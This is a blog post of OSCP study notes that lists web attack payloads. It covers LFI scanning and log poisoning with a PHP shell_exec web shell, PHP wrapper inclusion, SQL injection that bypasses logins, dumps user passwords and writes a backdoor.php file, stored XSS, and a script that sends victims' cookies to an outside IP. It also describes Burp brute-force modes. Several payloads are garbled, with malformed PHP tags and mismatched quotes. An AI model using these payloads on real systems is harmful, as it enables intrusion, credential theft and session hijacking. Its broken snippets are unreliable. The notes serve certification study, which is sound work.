Certification

OSCP notes dump: #EXPLOIT-WEB

Philipp Fragstein

Feb 5, 2023 • 2 min read

I wanted to have some kind of “code-shot” for a website so I just took some and I thought might as well upload it for everyone :) — Photo by Maik Jonietz / Unsplash

Another blog post containing various OSCP preparation notes about web-based attacks. As always don't consider these notes to be a complete chapter about OSCP web attacks.

LFI

# basic LFI scan
wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=FUZZ
# using php://filter for local file inclusion
http://example.com/index.php?m=php://filter/convert.base64-encode/resource=index
# logfile injection
# first netcat to the webserver
nc -nv <target-ip> 80
# insert code into access.log // pre preserves any line breaks/formatting
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
# execute code with
http://192.168.210.10/menu.php?file=c:\xampp\apache\logs\access.log&cmd=

PHP-Wrappers

# data - indicator 
http://10.10.10.10/menu.php?file=data:text/plain,hello world
# exploitation
http://10.10.10.10/menu.php?file=data:text/plain,<php echo shell_exec("dir") ?>
# phpfilter
/index.php?m=php://filter/convert.base64-encode/resource=index

SQL Injection

# basic sql injection for login forms
# if the following error occur try limiting the results //Notice:  Trying to get property 'num_rows' of non-object in C:\xampp\htdocs\login.php on line 22
root' or 1 = 1 LIMIT 1;
#if the code stil is not executed try “commenting” out the rest of the SQL with a hashtag "#"
root' or 1 = 1 LIMIT 1;#
# using order by 
# order by sorts the results of the original query by one or more values of the column 
# before using A UNION statemant figuring out how many colums the db have is essential
id = 1 order by 1
id = 2 order by 2
# once an error occurs we know we've reached the end of n of columns
# union all 
# this statement extrends the original statement with for example an additional select query. 
# each select statemtn must query the same amount of columns 
# mariadb version enumeration
id=1 union all select 1, 2, @@version
# mariadb user enumeration
id=1 union all select 1, 2, user()
# getting an overview over the db with information_schema
id=1 union all select 1, 2, table_name from information_schema.tables
# selecting user and password information
id=1 union all select 1, user, password from users
# file inclusion over sql injection with “load_file" function
id=1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')
# code injection over sql injection with “into outfile” function
id=1 union all select 1, 2, “<php echo shell_exec(”$_GET['cmd']);?>" into OUTFILE ‘c:/xampp/htdocs/backdoor.php’
# commenting out user name field 
admin'-- -

XSS

# stored XSS
<iframe src="http://10.10.10.10/report height="0" width="0"></iframe>
# cookie stealing
# in case js is allowed to get access to the session cookie this should be possible 
# the httponly flag disallows the access from js to the cookie
<script>new Image().src="http://192.168.119.210/hacked.jpg?output="+document.cookie;</script>

Burp Suite

# sniper
# snipe targets the first payload set field and uses an attached wordlist for bruting.
# the second payload set is meanwhile attacked with a same pre-defined word over and over again.
Example usage
Admin:Pass1
Admin:Pass2
Admin:Pass3
# battery ram
# this method equals both payloads during the attack
# Example:
Admin:Admin
User:User
# cluster bomb
# try every combination of each payload set
Example:
Admin:Pass1
Admin:Pass2
Admin:Pass3
Admin2:Pass1
Admin2:Pass2
Admin2:Pass3
# pitchfork
use the same line item of each payload set together
# Example:
Admin:Pass1
User:Pass2